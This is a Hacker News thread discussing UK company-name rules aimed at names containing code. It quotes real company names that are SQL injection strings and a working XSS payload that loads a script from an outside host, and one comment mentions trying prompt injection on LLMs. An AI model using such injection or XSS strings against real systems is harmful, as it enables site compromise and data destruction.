It seems to have been hackernews'd:<p><a href="https://web.archive.org/web/20231204144437/https://www.parallelparliament.co.uk/mp/alison-thewliss/bill/2022-23/economiccrimeandcorporatetransparency#9369E91A-2B4D-445F-A66B-1A5071727932" rel="nofollow noreferrer">https://web.archive.org/web/20231204144437/https://www.paral...</a><p>It's an entertaining link
There have been several companies like this.<p>Company 10542519 was named "; DROP TABLE "COMPANIES";-- LTD"<p>Company SC656788 is still named ROBERT'); DROP TABLE STUDENTS; LIMITED<p>Company 08768324 named DROP TABLE CONSULTANTS; LTD<p>And company 12956509 was named "><SCRIPT SRC=HTTPS://MJT.XSS.HT></SCRIPT> LTD (which you'll note works)<p>There have always been certain restrictions on company names [1] containing words like 'Police' or 'Financial Conduct Authority' and you can't even name your company 'Insurance' without the permission of insurance regulators. So this new rule isn't particularly onerous.<p>In fact, under existing legislation they could have added 'script src' and 'drop table' to an existing list of sensitive words that aren't allowed.<p>[1] <a href="https://www.gov.uk/government/publications/incorporation-and-names" rel="nofollow noreferrer">https://www.gov.uk/government/publications/incorporation-and...</a>
If I read this right, the UK is planning legislation to allow company registries to reject company names that contain "computer code", on the basis that it could be done for the purpose of SQL injection.<p>What's being debated is what is "computer code", and whether this legislation makes any sense at all.
This is the company in question:<p><a href="https://find-and-update.company-information.service.gov.uk/company/" rel="nofollow noreferrer">https://find-and-update.company-information.service.gov.uk/c...</a><p>And a post from the person who registered it<p><a href="https://pizzey.me/posts/no-i-didnt-try-to-break-companies-house/" rel="nofollow noreferrer">https://pizzey.me/posts/no-i-didnt-try-to-break-companies-ho...</a>
Link to the (still up) Hansard: <a href="https://hansard.parliament.uk/Commons/2022-11-01/debates/585ae229-3af6-4374-8e4a-0361ea230fe7/EconomicCrimeAndCorporateTransparencyBill(FifthSitting)#contribution-9369E91A-2B4D-445F-A66B-1A5071727932" rel="nofollow noreferrer">https://hansard.parliament.uk/Commons/2022-11-01/debates/585...</a><p>Also link to previous discussion the company in question:<p><a href="https://news.ycombinator.com/item?id=27815396">https://news.ycombinator.com/item?id=27815396</a><p>And link to the company: <a href="https://find-and-update.company-information.service.gov.uk/company/10542519" rel="nofollow noreferrer">https://find-and-update.company-information.service.gov.uk/c...</a>
A quick search[0] of the Companies House site gives the following "cheeky" SQL names:<p>- DROP TABLE LTD<p>- DROP TABLE USERS LTD<p>- DROP TABLE CONSULTANTS; LTD<p>- ROBERT'); DROP TABLE STUDENTS; LIMITED<p>[0] <a href="https://find-and-update.company-information.service.gov.uk/search?q=drop+table" rel="nofollow noreferrer">https://find-and-update.company-information.service.gov.uk/s...</a>
Old article about it - <a href="https://www.theguardian.com/uk-news/2020/nov/06/companies-house-forces-business-name-change-to-prevent-security-risk" rel="nofollow noreferrer">https://www.theguardian.com/uk-news/2020/nov/06/companies-ho...</a>
I wonder if this is easier or harder to do when the system you're messing with is an LLM. I doubt it would work reliably, but you should be able to show prompt injection working.
While the call for greater clarity is important, the ambiguity or 'wiggle room' in the phrase is important<p>>>“in the opinion of the Secretary of State”<p>IDK specifically about English law, but I worked directly with the DMV in Vermont. Slightly outside of the project, but the state allows pretty much any vanity plates, of course with the law specifying "shall not be objectively obscene or confusing to the general public". But this leaves room for interpretation. I heard of an incident where a state trooper was sent to retrieve a plate that had inappropriately passed screening, reading "3MTA3" (read it in the mirror).<p>Laws do need to be sufficiently precise to be not abused with selective enforcement, but sufficiently flexible to handle edge cases.
Reminds me of two of my favorite old stories.<p>Hello, I'm Mr. Null: <a href="https://www.wired.com/2015/11/null/" rel="nofollow noreferrer">https://www.wired.com/2015/11/null/</a><p>Falsehoods Programmers Believe About Names: <a href="https://www.kalzumeus.com/2010/06/17/falsehoods-programmers-believe-about-names/" rel="nofollow noreferrer">https://www.kalzumeus.com/2010/06/17/falsehoods-programmers-...</a>
Hmm, what about legit cases, such as naming a company after oneself (i.e. McDonald’s)? There are plenty of people with the family name “Null”, though perhaps not so many in the UK.
The idea that computer code can't be a company name is just begging for clever company names to skirt this rule, especially with so many languages that are light in syntax.<p>SQL is a natural contender with potential queries like “select customers from store” but I'm curious how far this can be taken and what other “computer code” company names other languages would make possible.
It's amazing how much the zeitgeist has changed since this was first published: <a href="https://imgs.xkcd.com/comics/exploits_of_a_mom.png" rel="nofollow noreferrer">https://imgs.xkcd.com/comics/exploits_of_a_mom.png</a><p>Geeks and nerds are no longer the near universally admired weirdos bringing the wonderful future.